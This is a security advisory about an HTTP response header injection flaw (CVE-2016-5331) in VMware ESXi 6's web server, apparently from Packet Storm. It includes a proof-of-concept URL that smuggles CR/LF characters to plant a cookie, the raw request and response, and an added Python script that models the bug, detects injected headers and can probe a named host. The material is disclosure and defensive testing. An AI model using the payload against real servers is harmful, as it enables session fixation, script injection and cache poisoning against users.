VMware vSphere Hypervisor (ESXi) HTTP Response Injection

2016-08-05T00:00:00
ID PACKETSTORM:138211
Type packetstorm
Reporter Matthias Deeg
Modified 2016-08-05T00:00:00

Description

                                        
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2016-063  
Product: VMware vSphere Hypervisor (ESXi)  
Manufacturer: VMware, Inc.  
Affected Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1)  
VMware vCenter Server 6.0 U2  
Tested Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1)  
Vulnerability Type: Improper Input Validation (CWE-20)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2016-07-01  
Solution Date: 2016-08-04  
Public Disclosure: 2016-08-05  
CVE Reference: CVE-2016-5331  
Authors of Advisory: Matthias Deeg (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
VMware vSphere Hypervisor is a type-1 hypervisor for serving virtual  
machines.  
  
The manufacturer describes the product as follows (see [1]):  
  
"Virtualize even the most resource-intensive applications with peace of  
mind. VMware vSphere Hypervisor is based on VMware ESXi, the hypervisor  
architecture that sets the industry standard for reliability and  
performance."  
  
Due to improper input validation, the web server of VMware ESXi 6 is  
prone to HTTP response injection attacks.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
SySS GmbH found that the web server of VMware ESXi 6 is vulnerable to  
HTTP response header injection: the query string of a request is copied  
into the Location header of the server's redirect response without  
neutralising carriage return and line feed characters (%0d%0a).  
  
An attacker can therefore craft a URL whose query string terminates the  
Location header early and appends attacker-controlled header lines to  
the response of the VMware ESXi web server.  
  
The impact depends on the context in which the response is consumed. If  
a victim visits such a URL, an attacker may for example set cookies in  
the victim's web browser, execute arbitrary JavaScript code, or poison  
the caches of intermediate proxy servers.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
The following URL is a simple attack vector to illustrate the HTTP  
response header injection vulnerability by setting an  
attacker-controlled session cookie named "test" with the value "31337"  
within the victim's web browser:  
  
https://<HOST>/?syss%0d%0aset-cookie:test=31337%0d%0at=1  
  
The corresponding HTTP GET request and the VMware ESXi web server  
response are shown below. Note that the server appends a trailing slash  
to the copied value; it lands on the last injected line ("t=1/"), so the  
injected set-cookie line itself arrives intact:  
  
GET /?syss%0d%0aset-cookie:test=31337%0d%0at=1 HTTP/1.1  
Host: <HOST>  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: close  
  
  
HTTP/1.1 303 See Other  
Date: Thu, 30 Jun 2016 15:12:23 GMT  
Connection: close  
Location: /?syss  
set-cookie:test=31337  
t=1/  
X-Frame-Options: DENY  
Content-Length: 0  
  
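The following Python script is an added example, not code from this advisory or from VMware. It models the behaviour described in the Vulnerability Details and PoC sections: build_redirect_vulnerable() copies the URL-decoded query string into the Location header of a 303 response, so the %0d%0a of the PoC becomes a raw CR/LF inside the header block; build_redirect_hardened() re-encodes the value so CR/LF can never end a header line; parse_response_headers() splits a response at every CRLF the way a browser or proxy does, and injected_headers() lists the headers the server never meant to send. All responses are constructed in-process from the PoC shown above; the optional probe() function sends the PoC request to a host you name (assumed to be a lab system with a self-signed certificate) and runs the same check. The names POC_QUERY, EXPECTED_HEADERS and probe are this example's own.

```python
"""
Added example (not from the SySS advisory or VMware): models the HTTP
response header injection described in SYSS-2016-063 and checks for it.
"""
import socket
import ssl
from urllib.parse import quote, unquote

# The advisory's PoC query string, exactly as the browser sends it.
POC_QUERY = "syss%0d%0aset-cookie:test=31337%0d%0at=1"

# Header names a clean redirect from the server is expected to carry,
# taken from the response shown in the PoC.
EXPECTED_HEADERS = {"date", "connection", "location",
                    "x-frame-options", "content-length"}


def _redirect_response(location: str) -> bytes:
    """Serialise a 303 redirect with the header set seen in the PoC."""
    head = (
        "HTTP/1.1 303 See Other\r\n"
        "Connection: close\r\n"
        f"Location: {location}\r\n"
        "X-Frame-Options: DENY\r\n"
        "Content-Length: 0\r\n\r\n"
    )
    return head.encode("latin-1")


def build_redirect_vulnerable(query: str) -> bytes:
    """Model of the vulnerable behaviour: the decoded query is copied verbatim
    into Location (plus the trailing slash seen in the advisory's response),
    so CR/LF from the query ends up inside the header block."""
    return _redirect_response("/?" + unquote(query) + "/")


def build_redirect_hardened(query: str) -> bytes:
    """Same redirect, but the decoded value is percent-encoded again so that
    CR, LF and every other byte outside the URL character set stay encoded;
    attacker input can no longer terminate the header line."""
    safe_value = quote(unquote(query), safe="-._~!$&'()*+,;=:@/?")
    return _redirect_response("/?" + safe_value + "/")


def parse_response_headers(raw: bytes):
    """Split a raw HTTP response into (status_line, [(name, value), ...]).
    Every CRLF ends a header line, which is exactly why an injected CRLF
    turns the tail of Location into new headers. A line without a colon is
    kept with value None so the caller sees what a client would see."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip() if sep else None))
    return lines[0], headers


def injected_headers(raw: bytes, expected=EXPECTED_HEADERS):
    """Headers present in the response that are not in the expected set:
    non-empty for the vulnerable response, empty for the hardened one."""
    _, headers = parse_response_headers(raw)
    return [(name, value) for name, value in headers if name not in expected]


def probe(host: str, port: int = 443, timeout: float = 5.0):
    """Send the PoC request from the advisory to a host and report injected
    headers. Certificate verification is disabled because a lab ESXi host
    usually presents a self-signed certificate; do not reuse this setting
    outside a test environment."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    request = (
        f"GET /?{POC_QUERY} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(request)
            raw = b""
            while b"\r\n\r\n" not in raw:
                chunk = tls.recv(4096)
                if not chunk:
                    break
                raw += chunk
    return injected_headers(raw)


if __name__ == "__main__":
    for label, builder in (("vulnerable", build_redirect_vulnerable),
                           ("hardened", build_redirect_hardened)):
        raw = builder(POC_QUERY)
        print(f"--- {label} ---")
        print(raw.decode("latin-1"))
        print("injected:", injected_headers(raw))
```

Run without arguments to print both constructed responses; in the vulnerable one the parser reports set-cookie and the stray "t=1/" line as extra headers, while the hardened Location carries the same input as a single line with %0D%0A still encoded. Rejecting the request with a 400 instead of re-encoding is an equally valid fix; the important property is that no raw CR or LF reaches a header line.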
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The manufacturer VMware has fixed the reported security vulnerability  
and disclosed detailed information about the issue and a software update  
for affected products in its security advisory VMSA-2016-0010 [4].  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2016-07-01: Vulnerability reported to manufacturer  
2016-07-01: Manufacturer acknowledges e-mail with SySS security advisory  
2016-07-14: Manufacturer further investigates the reported security  
issue  
2016-07-22: Manufacturer announces disclosure of this security issue  
2016-08-04: Public release of VMware security advisory VMSA-2016-0010  
and security update  
2016-08-05: Public release of SySS security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for VMware vSphere Hypervisor (ESXi)  
https://my.vmware.com/web/vmware/info/slug/datacenter_cloud_infrastructure/vmware_vsphere_hypervisor_esxi/6_0  
[2] SySS Security Advisory SYSS-2016-063  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-063.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy/  
[4] VMware Security Advisory VMSA-2016-0010   
http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was independently found and reported by  
Matthias Deeg of SySS GmbH, Vladimir Ivanov, Andrey Evlanin, Mikhail   
Stepankin, Artem Kondratenko, Arseniy Sharoglazov of Positive  
Technologies, Matt Foster of Netcraft Ltd, Eva Esteban Molina of   
A2secure and Ammarit Thongthua (see [4]).  
  
E-Mail: matthias.deeg (at) syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc  
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web   
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2  
  
iQIcBAEBCgAGBQJXpF3hAAoJENmkv2o0rU2rJr0P/RYc3j268fzTLERUG5CvLKYV  
HNI1a4p2/Mg0lzc/n1/7aZOzX9eRQe0jVyFkv90/843IWCdofQU3aqLBwFSIsFZP  
C9Tv3JYpk4T68uzCIriqxqHgt+qza1evfmPTOP2RHua0iaOOQSohzY/cWo3Uc9Yj  
Qag+JmnwPWZJNzkL1i41F6oO6aKurM65XBtmAdKQVQwwJ1WYMpiM3vV71hIq18sO  
OSJOgKQQMAR/1U7UVd3IgFIUv4+2mdDPyEdlnzPiTtpmJvZQf8H3k9054auCWBWa  
U2WOesD5FsCS4nBmuvlTc+jALlqC2SRRgR1UpiEvXTYYunWrOFustGnj4fFvgg7S  
omtMdN8dnWdD6BXZXg2k/yVH0WToVWtwV0meKtSg9b0jOywKBVzoYO19vpchHaz4  
/Eyxd8HQHpToM3OgwHagFXosF3TGxwQySPlDHdQD5gYANzDBhS8uQ02Gwx2v9NCX  
cC/jbTDUC0fa2qNJL/wwN7unqmrdOkGEYlvTjme6wlDR5axB46GunSH5yNg5OKFl  
G1s7lZ+ZbcywBxScLx1k7ITa1tNL3PNet5/Ld6A1hi3yhONmRgkyfgB+YqN04xaR  
3b5U6eqnPfm8d52yVPa7zySVc1vN9mrQ87dCmnXWGE9xk++SXoeDLv3PbKrY65Iy  
w/x007duLbe7k/xSJ1Ip  
=/k7W  
-----END PGP SIGNATURE-----  